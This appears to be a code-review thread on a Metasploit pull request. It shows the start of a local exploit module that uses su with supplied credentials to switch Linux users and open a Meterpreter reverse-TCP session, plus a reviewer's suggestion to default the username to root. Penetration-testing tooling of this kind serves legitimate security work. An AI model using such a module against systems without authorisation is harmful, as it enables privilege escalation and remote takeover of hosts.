modules/exploits/linux/local/su_login.rb

```diff
@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  include Msf::Post::Linux
+  include Msf::Post::Linux::System
+  include Msf::Post::Unix
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+
+  Rank = NormalRanking
+
+  def initialize(info = {})
+    super(
+        update_info(
+          info,
+          'Name' => 'Login to Another User with Su on Linux / Unix Systems',
+          'Description' => %q{
+            This module attempts to create a new login session by
+            invoking the su command of a valid username and password.
+
+            If the login is successful, a new session is created via
+            the specified payload.
+
+            Because su forces passwords to be passed over stdin, this
+            module attempts to invoke a psuedo-terminal with python,
+            python3, or script.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => 'Gavin Youker <youkergav@gmail.com>',
+          'DisclosureDate' => '1971-11-03',
+          'Platform' => ['linux', 'unix'],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Targets' => [
+            [
+              'Linux x86', {
+                'Arch' => ARCH_X86,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'Linux x86_64', {
+                'Arch' => ARCH_X64,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+              }
+            ],
+          ],
+          'DefaultTarget' => 0,
+          'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+          'SessionTypes' => ['shell', 'meterpreter']
+        )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'Username to authenticate with.']),
```

Comment:
`root` might be a useful default value. I suspect this is the most likely use case.

```suggestion
      OptString.new('USERNAME', [true, 'Username to authenticate with.', 'root']),
```

Reply:
I like this idea! I also added the `PASSWORD` value optional. That way, if someone is root and wants to switch to another user, they might not need to provide a password (though, this use case in unlikely). See commit a59558f03c8e9036adbf8d93213b41f6112d850e